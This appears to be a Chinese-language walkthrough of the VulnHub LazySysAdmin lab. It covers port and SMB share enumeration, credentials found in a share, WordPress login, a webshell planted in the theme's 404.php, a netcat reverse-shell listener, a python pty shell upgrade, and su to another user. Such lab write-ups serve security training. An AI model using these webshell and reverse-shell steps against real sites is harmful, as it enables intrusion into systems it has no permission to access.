VulnHub lazysysadmin

一、信息收集

1.nmap扫描开发端口

开放了:22、80、445

VulnHub lazysysadmin_第1张图片

访问80端口,没有发现什么有价值的信息

VulnHub lazysysadmin_第2张图片

2.扫描共享文件

enum4linux--扫描共享文件
使用:
enum4linux 192.168.103.182

windows访问共享文件
\\192.168.103.182\文件夹名称


VulnHub lazysysadmin_第3张图片

信息收集:

VulnHub lazysysadmin_第4张图片

发现了一个密码,先收集一下

VulnHub lazysysadmin_第5张图片

发现了一个数据库的账号密码

user:Admin
password:TogieMYSQL12345^^

VulnHub lazysysadmin_第6张图片

3.扫目录

利用dirb

发现有phpmyadmin/和wordpress/目录

VulnHub lazysysadmin_第7张图片

登录phpmyadmin/

登录进去后,发现查询不了数据库内容

user:Admin
password:TogieMYSQL12345^^

VulnHub lazysysadmin_第8张图片

访问wordpress/目录

一直提示用户:togle

VulnHub lazysysadmin_第9张图片

二、漏洞利用

1.wordpress 获取主机权限

1.wordpress登录地址:
http://192.168.103.182/wordpress/wp-admin

2.修改404页面,写入webshell
appearance--editor--404.php

3.访问404页面,反向连接(前提是先在控制端开启监听)
http://192.168.103.182/wordpress/wp-content/themes/twentyfifteen/404.php

登录wordpress地址
user:Admin
password:TogieMYSQL12345^^

VulnHub lazysysadmin_第10张图片

修改404页面,写入webshell

ip是监听机的IP地址(kali)

VulnHub lazysysadmin_第11张图片

VulnHub lazysysadmin_第12张图片

访问404页面,反向连接(前提是先在控制端开启监听)
┌──(rootkali)-[~]
└─# nc -lvvp 4444               
listening on [any] 4444 ...

然后再访问404.php
http://192.168.103.182/wordpress/wp-content/themes/twentyfifteen/404.php

python3 -c 'import pty; pty.spawn("/bin/bash")'  #python交互式shell

VulnHub lazysysadmin_第13张图片

三、提权

密码是最开始找到的一个密码,12345

www-data@LazySysAdmin:/home$ su togie
su togie
Password: 12345

VulnHub lazysysadmin_第14张图片

VulnHub lazysysadmin_第15张图片

你可能感兴趣的:(web,VulnHub,网络,安全,网络安全,web,python,vulnhub)